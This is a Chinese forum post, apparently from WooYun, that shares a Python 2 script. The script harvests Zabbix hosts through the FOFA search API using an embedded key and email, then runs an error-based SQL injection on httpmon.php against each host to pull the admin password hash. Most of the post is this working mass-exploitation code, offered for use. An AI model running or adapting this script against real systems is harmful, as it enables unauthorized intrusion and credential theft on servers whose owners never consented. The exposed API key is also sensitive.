看到有小伙伴问fofa搜索结果采集的问题 
http://zone.wooyun.org/content/17971 

贴上之前写过的一个简单的采集加利用，代码效率特别低，就抛砖引玉一下！ 

fofa在不登录状态下默认只展示一部分搜索结果，可以利用它提供的api接口来获取所有的搜索结果。用户名+对应key的形式。 

代码是搜索  title=zabbix，并对获取的结果进行zabbix注入漏洞的利用，最终打印出存在漏洞的URL和密码md5. 

#coding:utf-8 

import urllib2,urllib,cookielib 
import re,sys 
import base64 
import os,json 

def vulwebsearch(keywords): 
    vulhostlist=[] 
    urlenkeywords=urllib2.quote(keywords) 
    searchurl="http://fofa.so/api/result?qbase64="+base64.b64encode(keywords)+"&key=d69f306296e8ca95fded42970400ad23&email=her0m@qq.com" 
    req=urllib2.urlopen(searchurl) 
    restring=req.read() 
    restring=json.loads(restring) 
    zabbixsqli(restring['results']) 
       
def zabbixsqli(vulhostlist): 
    for vulhost in vulhostlist: 
        if not vulhost.startswith('http'): 
            vulhost="http://"+vulhost 
        zabbix_url=vulhost   
        try: 
            payload="""/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29""" 
             
            content=urllib.urlopen(zabbix_url)   
            if content.getcode()==200: 
                fzadminmd5_url=zabbix_url+payload 
                req=urllib2.urlopen(fzadminmd5_url) 
                html=req.read() 
                adminmd5=re.findall("\~.*\~\~",html) 
                if len(adminmd5)==1: 
                    print zabbix_url,adminmd5 
            #zabbixweakpass(zabbix_url)   
        except: 
            pass 
         
if __name__=="__main__": 
     
    if len(sys.argv)!=2: 
        print "Usage:"+"python"+" fofa_zabbix.py "+"keywords" 
        print "example:"+"python fofa_zabbix.py title=zabbix" 
        sys.exit() 
    else: 
        vulwebsearch(sys.argv[1])

如图：